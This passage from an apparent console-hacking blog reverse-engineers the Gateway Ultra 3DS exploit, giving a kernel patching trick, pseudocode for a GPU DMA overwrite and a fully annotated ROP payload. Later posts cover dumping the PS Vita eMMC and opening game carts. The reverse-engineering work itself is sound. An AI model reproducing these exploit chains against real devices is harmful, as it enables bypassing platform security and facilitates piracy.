  14:	eb001051 	bl	0x4160
  18:	e59d1008 	ldr	r1, [sp, #8]
  1c:	e28dd00c 	add	sp, sp, #12
  20:	e49df004 	pop	{pc}		; (ldr pc, [sp], #4)

How do we patch this to control code flow? What if we get rid of the “add” on line 0x1c? Then we have on line 0xc, *SP = R0 and on line 0x20, PC = *SP, and since we trivially control R0 in a syscall, we can pass in a function pointer and run it.

Now if we replace the code at 0x18 with either 0xF4450000 or 0xE4450000, another problem arises. Both of those instructions (and there may be others from other firmware versions) try to dereference R5, which we don’t control. However, what if we write 0xF4450000/0xE4450000 starting at 0x1B? It would now corrupt two instructions instead of just one, but both are “safe” instructions.

...
  14:	eb001051 	bl	0x4160
  18:	009d1008 	addseq	r1, sp, r8
  1c:	e2e44500 	rsc	r4, r4, #0, 10
...

The actual code that is there isn’t particularly useful/important, which is exactly what we want. We successfully patched the kernel to jump to our code with a single syscall. Now making SVC 8 with R0 pointing to some function would run it in ARM11 kernel mode.

Closing

Although some may call this exploit overly simple, I thought the way it was exploited was very novel. It involved overwriting pointers that are meant to be inaccessible to users, then a type confusion of pointer to ARM code, and finally abusing unaligned writes to corrupt instructions in a safe way. Next time, I hope to conclude this series by reversing the ARM9 kernel exploit (for those unfamiliar, the 3DS has two kernels, one for applications and one for security, ARM9 is the interesting one). I want to thank, again, sbJFn5r for providing me with various dumps.

Reversing Gateway Ultra First Stage (Part 2)

When we last left off, we looked at the ROP code that loaded a larger second-part of the payload. Now we will walk through what was loaded and how userland native code execution was achieved. I am still an amateur at 3DS hacking so I am sure to get some things wrong, so please post any corrections you have in the comments and I will update the post as needed.

Pseudocode

Some of the hard coded addresses are inside the stack payload loaded by the first part from Launcher.dat (at 0x08F01000).

int GX_SetTextureCopy(void *input_buffer, void *output_buffer, unsigned int size, 
int in_x, int in_y, int out_x, int out_y, int flags);
int GSPGPU_FlushDataCache(void *addr, unsigned int len);
int svcSleepThread(unsigned long long nanoseconds);
void memcpy(void *dst, const void *src, unsigned int len);

// There are offsets and addresses specific to each FW version inside of 
// the first stage that is used by both the first and second stage payloads
struct // example for 4.1.0
{
    void (*payload_code)(void); // 0x009D2000
    unsigned int unk_4; // 0x252D3000
    unsigned int orig_code; // 0x1E5F8FFD
    void *payload_target; // 0x192D3000
    unsigned int unk_10; // 0xEFF83C97
    unsigned int unk_14; // 0xF0000000
    unsigned int unk_18; // 0xE8000000
    unsigned int unk_1C; // 0xEFFF4C80
    unsigned int unk_20; // 0xEFFE4DD4
    unsigned int unk_24; // 0xFFF84DDC
    unsigned int unk_28; // 0xFFF748C4
    unsigned int unk_2C; // 0xEFFF497C
    unsigned int unk_30; // 0x1FFF4C84
    unsigned int unk_34; // 0xFFFD0000
    unsigned int unk_38; // 0xFFFD2000
    unsigned int unk_3C; // 0xFFFD4000
    unsigned int unk_40; // 0xFFFCE000
} fw_specific_data;

void payload() // base at 0x08F01000
{
    int i;
    unsigned int kversion;
    struct fw_specific_data *data;
    int code_not_copied;

    // part 1, some setup
    *(int*)0x08000838 = 0x08F02B3C;
    svcSleepThread (0x400000LL);
    svcSleepThread (0x400000LL);
    svcSleepThread (0x400000LL);
    for (i = 0; i < 3; i++) // do 3 times to be safe
    {
        GSPGPU_FlushDataCache (0x18000000, 0x00038400);
        GX_SetTextureCopy (0x18000000, 0x1F48F000, 0x00038400, 0, 0, 0, 0, 8);
        svcSleepThread (0x400000LL);
        GSPGPU_FlushDataCache (0x18000000, 0x00038400);
        GX_SetTextureCopy (0x18000000, 0x1F4C7800, 0x00038400, 0, 0, 0, 0, 8);
        svcSleepThread (0x400000LL);
    }

    kversion = *(unsigned int *)0x1FF80000; // KERNEL_VERSION register
    data = 0x08F02894; // buffer to store FW specific data

    // part 2, get kernel specific data from our buffer
    if (kversion == 0x02220000) // 2.34-0 4.1.0
    {
        memcpy (data, 0x08F028D8, 0x44);
    }
    else if (kversion == 0x02230600) // 2.35-6 5.0.0
    {
        memcpy (data, 0x08F0291C, 0x44);
    }
    else if (kversion == 0x02240000) // 2.36-0 5.1.0
    {
        memcpy (data, 0x08F02960, 0x44);
    }
    else if (kversion == 0x02250000) // 2.37-0 6.0.0
    {
        memcpy (data, 0x08F029A4, 0x44);
    }
    else if (kversion == 0x02260000) // 2.38-0 6.1.0
    {
        memcpy (data, 0x08F029E8, 0x44);
    }
    else if (kversion == 0x02270400) // 2.39-4 7.0.0
    {
        memcpy (data, 0x08F02A2C, 0x44);
    }
    else if (kversion == 0x02280000) // 2.40-0 7.2.0
    {
        memcpy (data, 0x08F02A70, 0x44);
    }
    else if (kversion == 0x022C0600) // 2.44-6 8.0.0
    {
        memcpy (data, 0x08F02AB4, 0x44);
    }

    // part 3, execute code
    do
    {
        // if the function has it's original code, we try again
        code_not_copied = *(unsigned int *)data->payload_code + data->orig_code == 0;
        // copy second stage to FCRAM
        memcpy (0x18410000, 0x08F02B90, 0x000021F0);
        // make sure data is written and cache flushed || attempted GW obfuscation
        memcpy (0x18410000, 0x18410000, 0x00010000);
        memcpy (0x18410000, 0x18410000, 0x00010000);
        GSPGPU_FlushDataCache (0x18410000, 0x000021F0);
        // copy the second stage code
        GX_SetTextureCopy (0x18410000, data->payload_target, 0x000021F0, 0, 0, 0, 0, 8);
        svcSleepThread (0x400000LL);
        memcpy (0x18410000, 0x18410000, 0x00010000);
    } while (code_not_copied);

    (void(*)() 0x009D2000)();
    // I think it was originally data->payload_code but later they hard coded it 
    // for some reason
}

Details

The first part, I’m not too sure about. I think it’s either some required housekeeping or needless calls to obfuscate the exploit (found later). I couldn’t find any documentation on the 0x1F4XXXXX region except that is it in the VRAM. (EDIT: plutoo tells me it’s the framebuffer. Likely the screen is cleared black for debugging or something.) I am also unsure of the use of setting 0x08000838 to some location in the payload that is filled with “0x002CAFE4″. In the second part, version specific information for each released kernel version is copied to a global space for use by both the first stage and the second stage exploit code. (This includes specific kernel addresses and stuff).

The meat of the exploit is an unchecked GPU DMA write that allows the attacker to overwrite read-only executable pages in memory. This is the same exploit used by smealum in his ninjhax and he gives a much better explanation of “gspwn” in his blog. In short, certain areas of the physical memory are mapped at some virtual address as read-only executable (EDIT: yellows8 tells me specifically, this is in a CRO, which is something like shared libraries for 3DS) but when the physical address of the same location is written to by the GPU, it does not go through the CPU’s MMU (since it is a different device) and can write to it. The need for thread sleep (and maybe the weird useless memcpys) is because the CPU’s various levels of cache needs some time to see the changes that it did not expect from the GPU.

The second stage of the payload is the ARM code copied from Launcher.dat (3.0.0) offset 0x1B90 for a length of 0x21F0 (remember to decrypt it using the “add”-pad stream cipher described in the first post).

Raw ROP Payload Annotated

It is a huge mess, but for those who are curious, here it is. The bulk of the code are useless obfuscation (for example, it would pop 9 registers full of junk data and then fill the same 9 registers with more junk data afterwards). However, the obfuscation is easy to get past if you just ignore everything except gadgets that do 1) memory loads, 2) memory stores, 3) set flags, or 4) function call. Every other gadget is useless. They also do this weird thing where they “memcpy” one part of the stack to another part (which goes past the current SP). However, comparing the two blocks of data (before and after the copy) shows nothing different aside from some garbage values.

Reversing Gateway Ultra First Stage (Part 1)

And now for something completely different…

As a break from Vita hacking, I’ve decided to play around with the Nintendo 3DS exploit released by Gateway yesterday. The 3DS is a much easier console to hack, but unfortunately, the scene is dominated by a piracy company who, ironically, implement various “features” to protect their intellectual property (one such feature purposely bricks any user of a cloned piracy cart–and also “legitimate” users too). Ethics aside, it would be useful to reverse Gateway’s exploits and use them for homebrew loading so I took a quick look at it. The first stage of the exploit is an entry-point into the system that allows code to run in the unprivileged user-mode. It is usually used to exploit a kernel vulnerability, which is the second stage. In the unique case of Gateway, the first stage is broken up into two parts (in order for them to obfuscate their payload). I am only going to look at the first part for now.

Vulnerability

The userland vulnerability is a known use-after-free bug in WebKit found in April last year (and no, the latest Vita firmware is not vulnerable). Depending on the user-agent of the 3DS visiting the exploit page, a different payload for that browser version is sent. A GBATemp user has dumped all the possible payloads, and I used the 4.x one in my analysis (although I believe the only difference in the different payloads are memory offsets).

Details

This is what the initial first stage payload does:

void *_this = 0x08F10000;
int *read_len = 0x08F10020;
int *buffer = 0x08F01000;
int state = 0;
int i = 0;
FS_MOUNTSDMC("dmc:");
IFile_Open(_this, L"dmc:/Launcher.dat", 0x1);
*((int *)_this + 1) = 0x00012000; // fseek according to sm on #3dsdev
IFile_Read(_this, read_len, buffer, 0x4000);

for (i = 0; i < 0x4000/4; i++)
{
    state += 0xD5828281;
    buffer[i] += state;
}

The important part here is that the rest of the payload is decrypted from “Launcher.dat” by creating a stream cipher from a (crappy) PRNG that just increments by 0xD5828281 every iteration. Instead of an xor-pad, it uses an “add”-pad. Otherwise it is pretty standard obfuscation. A neat trick in this ROP payload is the casting of ARM code as Thumb to get gadgets that were not originally compiled into code (I am unsure if they also tried casting RO data as Thumb code, as that is also a way of getting extra gadgets). Another neat trick is emulating loops by using ARM conditional stores to conditionally set the stack pointer to some value (although I was told they used this trick in the original Gateway payload too).

Future

The first part was very simple and straightforward and was easy to reverse. I am expecting that the second part would involve a lot more code so I may need to work on a tool to extract the gadgets from code. (By the way, thanks to sbJFn5r on #3dsdev for providing me with the WebKit code to look at and sm for the hint about fseek). It is likely that I won’t have the time to continue this though (still working on the Vita) but it seems like many others are farther ahead than me anyways.

Payload

For those who care, the raw (annotated) payload for 4.X:

0x08B47400: 0x0010FFFD ; (nop) POP {PC}
0x08B47404: 0x0010FFFD ; (nop) POP {PC}
0x08B47408: 0x0010FFFD ; (nop) POP {PC}
0x08B4740C: 0x0010FFFD ; (nop) POP {PC}
0x08B47410: 0x002AD574 ; LDMFD   SP!, {R0,PC}
0x08B47414: 0x002A5F27 ; R0 = "dmc:"
0x08B47418: 0x00332BEC ; FS_MOUNTSDMC(), then LDMFD   SP!, {R3-R5,PC}
0x08B4741C: 0x08B475F0 ; R3, dummy
0x08B47420: 0x00188008 ; R4, dummy
0x08B47424: 0x001DA00C ; R5, dummy
0x08B47428: 0x0017943B ; Thumb: POP     {R0-R4,R7,PC}
0x08B4742C: 0x08F10000 ; R0 = this
0x08B47430: 0x08B47630 ; R1 = L"dmc:/Launcher.dat"
0x08B47434: 0x00000001 ; R2 = read/only
0x08B47438: 0x0039B020 ; R3, dummy
0x08B4743C: 0x001CC01C ; R4, dummy
0x08B47440: 0x002C6010 ; R7, dummy
0x08B47444: 0x0025B0A8 ; IFile_Open(), then LDMFD   SP!, {R4-R7,PC}
0x08B47448: 0x00231FF0 ; R4, dummy
0x08B4744C: 0x002CBFF0 ; R5, dummy
0x08B47450: 0x00124000 ; R6, dummy
0x08B47454: 0x0033FFFD ; R7, dummy
0x08B47458: 0x0010FFFD ; (nop) POP {PC}
0x08B4745C: 0x002AD574 ; LDMFD   SP!, {R0,PC}
0x08B47460: 0x00012000 ; R0
0x08B47464: 0x00269758 ; LDMFD   SP!, {R1,PC}
0x08B47468: 0x08F10004 ; R1
0x08B4746C: 0x00140450 ; *(int*)0x08F10004 = 0x00012000, then LDMFD   SP!, {R4,PC}
0x08B47470: 0x001CC024 ; R4
0x08B47474: 0x0017943B ; Thumb: POP     {R0-R4,R7,PC}
0x08B47478: 0x08F10000 ; R0 = this
0x08B4747C: 0x08F10020 ; R1 = p_total_read
0x08B47480: 0x08F01000 ; R2 = read_buffer
0x08B47484: 0x00004000 ; R3 = size
0x08B47488: 0x00295FF8 ; R4, dummy
0x08B4748C: 0x00253FFC ; R7, dummy
0x08B47490: 0x002FC8E8 ; IFile_Read, then LDMFD   SP!, {R4-R9,PC}
0x08B47494: 0x002BE030 ; R4, dummy
0x08B47498: 0x00212010 ; R5, dummy
0x08B4749C: 0x00271F40 ; R6, dummy
0x08B474A0: 0x0020C05C ; R7, dummy
0x08B474A4: 0x002DE0C4 ; R8, dummy
... START_DECODE_LOOP ...
0x08B474A8: 0x001B2000 ; R9, dummy || LR, dummy (upon loop)
0x08B474AC: 0x002AD574 ; LDMFD   SP!, {R0,PC}
0x08B474B0: 0x08B4750C ; R0 (&state)
0x08B474B4: 0x001CCC64 ; R0 = *R0 = state, LDMFD   SP!, {R4,PC}
0x08B474B8: 0x001057C4 ; R4, dummy
0x08B474BC: 0x00269758 ; LDMFD   SP!, {R1,PC}
0x08B474C0: 0xD5828281 ; R1 (seed)
0x08B474C4: 0x00207954 ; R0 = R0 + R1, LDMFD   SP!, {R4,PC}
0x08B474C8: 0x0011FFFD ; R4, dummy
0x08B474CC: 0x00269758 ; LDMFD   SP!, {R1,PC}
0x08B474D0: 0x08B4750C ; R1 (&state)
0x08B474D4: 0x00140450 ; *R1 = R0 = next random, LDMFD   SP!, {R4,PC}
0x08B474D8: 0x00354850 ; R4, dummy
0x08B474DC: 0x002AD574 ; LDMFD   SP!, {R0,PC}
0x08B474E0: 0x08B47618 ; R0 (&buffer)
0x08B474E4: 0x001CCC64 ; R0 = *R0 = buffer, LDMFD   SP!, {R4,PC}
0x08B474E8: 0x00127F6D ; R4, dummy
0x08B474EC: 0x00100D24 ; LDMFD   SP!, {R4-R6,PC}
0x08B474F0: 0x001037E0 ; R4, dummy
0x08B474F4: 0x08B4748C ; R5, dummy
0x08B474F8: 0x08B4740C ; R6, dummy
0x08B474FC: 0x001CCC64 ; R0 = *R0 (read32 from buffer), LDMFD   SP!, {R4,PC}
0x08B47500: 0x0011BB00 ; R4, dummy
0x08B47504: 0x0010FFFD ; (nop) POP {PC}
0x08B47508: 0x00269758 ; LDMFD   SP!, {R1,PC}
0x08B4750C: 0x00000000 ; R1 (PRG state)
0x08B47510: 0x00207954 ; R0 = R0 + R1 (add PRG state to buffer data), LDMFD   SP!, {R4,PC}
0x08B47514: 0x001303A0 ; R4, dummy
0x08B47518: 0x00103DA8 ; LDMFD   SP!, {R4-R12,PC}
0x08B4751C: 0x00101434 ; R4, dummy
0x08B47520: 0x0022FF64 ; R5, dummy
0x08B47524: 0x001303A0 ; R6, dummy
0x08B47528: 0x08B47400 ; R7, dummy
0x08B4752C: 0x0010FFFD ; R8, dummy
0x08B47530: 0x0010FFFD ; R9, dummy
0x08B47534: 0x00100B5C ; R10, dummy
0x08B47538: 0x0022FE44 ; R11, dummy
0x08B4753C: 0x0010FFFD ; R12, (nop) POP {PC}
0x08B47540: 0x0018114C ; LDMFD   SP!, {R4-R6,LR}, BX R12
0x08B47544: 0x001057C4 ; R4, dummy
0x08B47548: 0x00228AF4 ; R5, dummy
0x08B4754C: 0x00350658 ; R6, dummy
0x08B47550: 0x0010FFFD ; LR, (nop) POP {PC}
0x08B47554: 0x00158DE7 ; R1 = R0 = (decoded data), BLX LR
0x08B47558: 0x002AD574 ; LDMFD   SP!, {R0,PC}
0x08B4755C: 0x08B47618 ; R0 (&buffer)
0x08B47560: 0x001CCC64 ; R0 = *R0 = buffer, LDMFD   SP!, {R4,PC}
0x08B47564: 0x0011FFFD ; R4, dummy
0x08B47568: 0x00119B94 ; *R0 = R1 = (decoded data), LDMFD   SP!, {R4,PC}
0x08B4756C: 0x00106694 ; R4, dummy
0x08B47570: 0x00269758 ; LDMFD   SP!, {R1,PC}
0x08B47574: 0x00000004 ; R1
0x08B47578: 0x00207954 ; R0 = R0 + R1 (buffer + 4), LDMFD   SP!, {R4,PC}
0x08B4757C: 0x00130344 ; R4, dummy
0x08B47580: 0x00269758 ; LDMFD   SP!, {R1,PC}
0x08B47584: 0x08B47618 ; R1 (&buffer)
0x08B47588: 0x00140450 ; *R1 = R0 (set new buffer), LDMFD   SP!, {R4,PC}
0x08B4758C: 0x00100D24 ; R4, dummy
0x08B47590: 0x00269758 ; LDMFD   SP!, {R1,PC}
0x08B47594: 0xF70FB000 ; R1
0x08B47598: 0x00207954 ; R0 = R0 + R1 = 0xFFFFC004, LDMFD   SP!, {R4,PC}
0x08B4759C: 0x00119864 ; R4, dummy
0x08B475A0: 0x001B560C ; SET_FLAGS (R0 != 0), if (flags) R0 = 1, LDMFD   SP!, {R3,PC}
0x08B475A4: 0x002059C0 ; R3, dummy
0x08B475A8: 0x002AD574 ; LDMFD   SP!, {R0,PC}
0x08B475AC: 0x08B47610 ; R0 (val for LR)
0x08B475B0: 0x00269758 ; LDMFD   SP!, {R1,PC}
0x08B475B4: 0x08F00FFC ; R1
0x08B475B8: 0x00119B94 ; *R0 = R1 = 0x08F00FFC (next stage), LDMFD   SP!, {R4,PC}
0x08B475BC: 0x00355FD4 ; R4, dummy
0x08B475C0: 0x00269758 ; LDMFD   SP!, {R1,PC}
0x08B475C4: 0x08B474A8 ; R1
0x08B475C8: 0x0020E780 ; if (flags) *R0 = R1 = 0x08B474A8 (loop), LDMFD   SP!, {R4,PC}
0x08B475CC: 0x002C2215 ; R4, dummy
0x08B475D0: 0x0010FFFD ; (nop) POP {PC}
0x08B475D4: 0x0010FFFD ; (nop) POP {PC}
0x08B475D8: 0x00103DA8 ; LDMFD   SP!, {R4-R12,PC}
0x08B475DC: 0x002D5654 ; R4, dummy
0x08B475E0: 0x00103778 ; R5, dummy
0x08B475E4: 0x002FA864 ; R6, dummy
0x08B475E8: 0x00119B94 ; R7, dummy
0x08B475EC: 0x0020E780 ; R8, dummy
0x08B475F0: 0x00128605 ; R9, dummy
0x08B475F4: 0x00103DA8 ; R10, dummy
0x08B475F8: 0x08B475F8 ; R11, dummy
0x08B475FC: 0x0010FFFD ; R12, dummy
0x08B47600: 0x0018114C ; LDMFD   SP!, {R4-R6,LR}
0x08B47604: 0x0010FFFD ; R4, dummy
0x08B47608: 0x002FC8E4 ; R5, dummy
0x08B4760C: 0x001037E0 ; R6, dummy
0x08B47610: 0x0023C494 ; LR (later set to 0x08B474A8)
0x08B47614: 0x002D6A30 ; SP = LR, LDMFD   SP!, {LR,PC}
... END OF ROP PAYLOAD ...
0x08B47618: 0x08F01000 ; buffer
0x08B4761C: 0x002D6A1C ; 
0x08B47620: 0x08B47400 ; 
0x08B47624: 0x0010FFFD ; 
0x08B47628: 0x0010FFFD ; 
0x08B4762C: 0x002D6A1C ; 
0x08B47630: L"dmc:/Launcher.dat"
0x08B47654: 0x00000000 ; 
0x08B47658: 0x00000000 ; 
0x08B4765C: 0x00000000 ; 
0x08B47660: 0x00000000 ; 
0x08B47664: 0x00000000 ; 
0x08B47668: 0x00000000 ; 
0x08B4766C: 0x002D6A1C ; 
0x08B47670: 0x00000000 ; 
0x08B47674: 0x00000000 ; 
0x08B47678: 0x00000000 ; 
0x08B4767C: 0x00000000 ; 
0x08B47680: 0x00000000 ; 
0x08B47684: 0x00000000 ; 
0x08B47688: 0x00000000 ; 
0x08B4768C: 0x00000000 ; 
0x08B47690: 0x00000000 ; 
0x08B47694: 0x00000000 ; 
0x08B47698: 0x00000000 ; 
0x08B4769C: 0x00000000 ; 
0x08B476A0: 0x00000000 ; 
0x08B476A4: 0x00000000 ; 
0x08B476A8: 0x00000000 ; 
0x08B476AC: 0x00000000 ; 
0x08B476B0: 0x00000000 ; 
0x08B476B4: 0x00000000 ; 
0x08B476B8: 0x00000000 ; 
0x08B476BC: 0x00000000 ; 
0x08B476C0: 0x00000000 ; 
0x08B476C4: 0x00000000 ; 
0x08B476C8: 0x00000000 ; 
0x08B476CC: 0x00000000 ; 
0x08B476D0: 0x00000000 ; 
0x08B476D4: 0x00000000 ; 
0x08B476D8: 0x00000000 ; 
0x08B476DC: 0x00000000 ; 
0x08B476E0: 0x00000000 ; 
0x08B476E4: 0x00000000 ; 
0x08B476E8: 0x00000000 ; 
0x08B476EC: 0x00000000 ; 
0x08B476F0: 0x00000000 ; 
0x08B476F4: 0x00000000 ; 
0x08B476F8: 0x00000000 ; 
0x08B476FC: 0x00000000 ; 

How to Disassemble Vita Game Cartridges

A hacker named katsu recently released a method for dumping Vita games. As a developer, I am completely against piracy, but as a reverse engineer I can’t shy away from taking apart perfectly working devices. However, most pictures I see of Vita game carts taken apart show the game cart casing damaged beyond repair or completely destroyed. I managed to take apart a game cart and put it together with no obvious signs of damage, and I thought I would share my (simple) method here.

Photo Feb 16, 7 48 07 PM

 

If you take a look at the top right or left corner of the game cart, you can see a line of where the two halves of the plastic was glued together. Locate the upper left corner and, with a sharp knife, push the blade into the line on the corner until you have a small dent. Then, move the knife downwards and wiggle the knife until you loosen the glue for the entire left side of the cart. Then keep moving the knife down and when you hit the bottom of the cart, turn and lose about half the bottom edge of the cart. Now you can use your fingers to spread the two halves apart (but be careful not to use too much force and tear the glue from the other two edges), and you can either shake the memory chip out or use a pair of tweezers.

Photo Feb 16, 7 42 47 PM

 

If you were to follow katsu’s pinout, you need to solder to the copper pads. A trick for doing so is to first flux up the points and then melt a pea-sized blob of solder in middle of all the points. Then take your iron and spread the blob around until all the pads are soldered up. Then just make the the remaining blob is not on top of any copper and you can easily remove it.

Photo Feb 16, 8 29 57 PM

 

Then you can solder wires onto the points to your heart’s content. After you’re done with everything, you can easily put the memory chip back into the casing and there is enough glue to keep the two halves of the case together (along with the memory chip). You can then continue to play the game.

Pinout for Vita game cart. Credits to katsu.

If you were to follow the pinout, you can see that it appears to be a standard NAND pinout (not eMMC and not Memory Stick Duo). I have not tested this, but I believe this means you can use NANDWay or any other NAND dumping technique (there’s lots for PS3 and Xbox 360) provided you attach to the right pins. I suspect that the Vita communicates with the game cart through the SD protocol with an additional line for a security interface, but that is just speculation. If that were the case, having one-to-one dumps would not allow you to create clone games. Regardless, I will not be looking too much into game carts because they are so closely tied with piracy.

Dumping the Vita NAND

When we last left off, I had spent an excess of 100 hours (I’m not exaggerating since that entire time I was working, I listened to This American Life and went through over a hundred one-hour episodes) soldering and tinkering with the Vita logic board to try to dump the eMMC. I said I was going to buy a eMMC socket from taobao (the socket would have let me clamp a eMMC chip down while pins stick out, allowing the pressure to create a connection) however, I found out that all the sellers of the eMMC socket from taobao don’t ship to the USA and American retailers sell the sockets for $300 (cheapest I could find). So I took another approach.

Packet Sniffing

My first hypothesis on why it is not working is that there’s some special initialization command that the eMMC requires. For example, CMD42 of the MMC protocol allows password protection on the chip. Another possibility was that the chip resets into boot mode, which the SD card reader doesn’t understand. To clear any doubts, I connected CLK, CMD, and DAT0 to my Saleae Logic clone I got from eBay.

Vita eMMC points connected to logic analyzer.

Vita eMMC points connected to logic analyzer.

As you can see from the setup, I had the right controller board attached so I can get a power indicator light (not required, but useful). I also took the power button out of the case and attached it directly. The battery must be attached for the Vita to turn on. Everything is Scotch-taped to the table so it won’t move around. Once all that is done, I captured the Vita’s eMMC traffic on startup.

First command sent to eMMC on startup

First command sent to eMMC on startup

After reading the 200 paged specifications on eMMC, I understood the protocol and knew what I was looking at. The very first command sent to the Vita is CMD0 with argument 0x00000000 (GO_IDLE_STATE). This is significant for two reasons. First, we know that the Vita does NOT use the eMMC’s boot features. The Vita does not have its first stage bootloader on the eMMC, and boots either from (most likely) an on-chip ROM or (much less likely) some other chip (that mystery chip on the other side maybe?). Second, it means that there’s no trickery; the eMMC is placed directly into Idle mode, which is what SD cards go into when they are inserted into a computer. This also means that the first data read from the eMMC is in the user partition (not boot partition), so the second or third stage loader must be in the user partition of the eMMC. For the unfamiliar, the user partition is the “normal” data that you can see at any point while the boot partition is a special partition only exposed in boot mode (and AFAIK, not supported by any USB SD card reader). Because I don’t see the boot partition used, I never bothered to try to dump it.

Dumping

I tried a dozen times last week on two separate Vita logic boards trying to dump the NAND with no luck. Now that I’m on my third (and final) Vita, I decided to try something different. First, I did not remove the resistors sitting between the SoC and eMMC this time. This is because I wanted to capture the traffic (see above) and also because I am much better at soldering now and the tiny points doesn’t scare me anymore. Second, because of my better understanding of the MMC protocol (from the 200 page manual I read), I no longer attempted to solder DAT1-DAT3 because that takes more time and gives more chance of error due to bad connections. I only connected CLK, CMD, and DAT0. I know that on startup, the eMMC is placed automatically into 1-bit read mode and must be switched to 4-bit (DAT0-DAT3) or 8-bit (DAT0-DAT7) read mode after initialization. My hypothesis is that there must be an SD card reader that followed the specification’s recommendation and dynamically choose the bus width based on how many wires can be read correctly (I also guessed that most readers don’t do this because SD cards always have four data pins). To test this, I took a working SD card, and insulated the pins for DAT1-DAT3 with tape. I had three SD card readers and the third one worked! I know that that reader can operate in 1-bit mode, so I took it apart and connected it to the Vita (CLK, CMD, DAT0, and ground).

As you can see, more tape was used to secure the reader.

As you can see, more tape was used to secure the reader.

I plugged it into the computer and… nothing. I also see that the LED read indicator on the reader was not on and a multimeter shows that the reader was not outputting any power either. That’s weird. I then put a working SD card in and the LED light turned on. I had an idea. I took the SD card and insulated every pin except Vdd and Vss/GND (taped over every pin) and inserted the SD card into the reader. The LED light came on. I guess there’s an internal switch that gets turned on when it detects a card is inserted because it tries to draw power (I’m not hooking up Vdd/Vss to the Vita because that’s more wires and I needed a 1.8V source for the controller and it’s just a lot of mess; I’m using the Vita’s own voltage source to power the eMMC). I then turned on the Vita, and from the flashing LED read light, I knew it was successful.

LED is on and eMMC is being read

LED is on and eMMC is being read

Analyzing the NAND

Here’s what OSX has to say about the eMMC:

Product ID: 0x4082
Vendor ID: 0x1e3d (Chipsbrand Technologies (HK) Co., Limited)
Version: 1.00
Serial Number: 013244704081
Speed: Up to 480 Mb/sec
Manufacturer: ChipsBnk
Location ID: 0x1d110000 / 6
Current Available (mA): 500
Current Required (mA): 100
Capacity: 3.78 GB (3,779,067,904 bytes)
Removable Media: Yes
Detachable Drive: Yes
BSD Name: disk2
Partition Map Type: Unknown
S.M.A.R.T. status: Not Supported

I used good-old “dd” to copy the entire /dev/rdisk2 to a file. It took around one and a half hours to read (1-bit mode is very slow) the entire eMMC. I opened it up in a hex editor and as expected the NAND is completely encrypted. To verify, I ran a histogram on the dump and got the following result: 78.683% byte 0xFF and almost exactly 00.084% for every other byte. 0xFF blocks indicate free space and such an even distribution of all the other bytes means that the file system is completely encrypted. For good measure, I also ran “strings” on it and could not find any readable text. If we assume that there’s a 78.600% free space on the NAND (given 0xFF indicates free space and we have an even distribution of encrypted bytes in non-free space), that means that 808.70MB of the NAND is used. That’s a pretty hefty operating system in comparison to PSP’s 21MB flash0.

What’s Next

It wasn’t a surprise that the eMMC is completely encrypted. That’s what everyone suspected for a while. What would have been surprising is if it WASN’T encrypted, and that tiny hope was what fueled this project. We now know for a fact that modifying the NAND is not a viable way to hack the device, and it’s always good to know something for sure. For me, I learned a great deal about hardware and soldering and interfaces, so on my free time, I’ll be looking into other things like the video output, the mystery connector, the memory card, and the game cards. I’ve also sent the SoC and the two eMMC chips I removed to someone for decapping, so we’ll see how that goes once the process is done. Meanwhile, I’ll also work more with software and try some ideas I picked up from the WiiU 30C3 talk. Thanks again to everyone who contributed and helped fund this project!

Accounting

In the sprit of openness, here’s all the money I’ve received and spent in the duration of this hardware hacking project:

Collected: $110 WePay, $327.87 PayPal, and 0.1BTC

Assets

Logic Analyzer: $7.85
Broken Vita logic board: $15.95
VitaTV x 2 (another for a respected hacker): $211.82
Rework station: $80
Broken 3G Vita: $31
Shipping for Chips to be decapped: $1.86

Total: $348.48 (I estimated/asked for $380)

I said I will donate the remaining money to EFF. I exchanged the 0.1BTC to USD and am waiting for mtgox to verify my account so I can withdraw it. $70 of donations will not be given to the EFF by the request of the donor(s). I donated $25 to the EFF on January 10, 2014, 9:52 pm and will donate the 0.1BTC when mtgox verifies my account (this was before I knew that EFF takes BTC directly).

PS Vita NAND Pinout (Updated)

Since the last post on the eMMC pinout, I found the other two important test points. First is VCCQ, which is the power to the eMMC controller. It needs to be pulled at 1.8V. The other point is VCC, which is the power to the actual NAND flash. It needs to be pulled at 3.3V.

Found on the bottom of the board, above the SoC

Found on the bottom of the board, above the SoC

Found on the bottom of the board, near the multi-connector

Found on the bottom of the board, near the multi-connector

For reference, the pad of the removed eMMC on the second Vita

For reference, the pad of the removed eMMC on the second Vita

 

 

Random observations on Vita logic board

While I’m waiting for more tools to arrive, here’s some things I’ve found while playing around with the continuity test on a multimeter. There is no stunning discovery here, just bits and pieces of thoughts that may not be completely accurate.

On Video Out

The unfilled pads next to the eMMC has something to do with video. The direction of the trace goes from the SoC to the video connector. A continuity test shows that all the pads comes from the SoC and leads to some point on the video connector. Could they be pads used for testing video in factory? Looking at the VitaTV teardown from 4gamer.net shows that traces in a similar location coming out of the SoC goes through similar looking components and then into the Op-Amp and to the HDMI connector. This is a stretch, but could these traces output HDMI if connected properly? As a side note, I could not find any direct connection between anything on the video connector to either the mystery port or the multi-connector. If Sony were to ever produce a video-out cable, there needs to be a software update as there doesn’t seem to be hardware support.

On the Mystery Port and USB

The first two pins on the mystery port appear to be ground (or Vdd and Vss). The last pin could be a power source. Pins 3 and 4 goes through a component and directly into the SoC. What’s interesting is that the D+/D- USB line from the multi-connector on the bottom goes through a similar looking component and that they are very close to the pins that handle the mystery port. Looking at 4gamer.net’s VitaTV teardown again, we see that the USB input port has two lines that go through very similar paths (the various components that it goes through) as the Vita’s USB output, but the position of the traces going into the SoC on the VitaTV is the same position of the trace on the Vita coming from the mystery port. Could the mystery port be a common USB host/USB OTG port with a custom plug?

On the Mystery Chip

Also 4gamer.net speculates the SCEI chip on the top of the board has something to do with USB, but I think that’s not true because USB lines go directly into the SoC. Which means that we still don’t know what the SCEI chip does (it is the only chip on the board that has yet been identified by any source). My completely baseless hypothesis is that it’s syscon because it would be reasonable to assume that the syscon is outside of the SoC since it would decide when to power own the SoC.

On the eMMC

This may be public knowledge but the Vita’s eMMC NAND is 4GB (same as VitaTV and Vita Slim). The new Vitas do not have any additional storage chips. This also means that the 1GB internal storage on the new Vitas is just another partition or something on that NAND (no hardware changes).

PS Vita NAND Pinout

Vita NAND Pinout

As promised, here’s the pinout for the Vita’s eMMC (NAND). Don’t be fooled by the picture; the size of the resistors are TINY. Plus, if you noticed, half the traces are almost hugging the shield base (which is pretty hard to remove without disturbing the resistors). I hope I can find a better way to dump the eMMC than soldering to these points. It’s doubtful that they are exposed elsewhere as I’ve checked every unfilled pad on both sides of the board. Wish me luck…

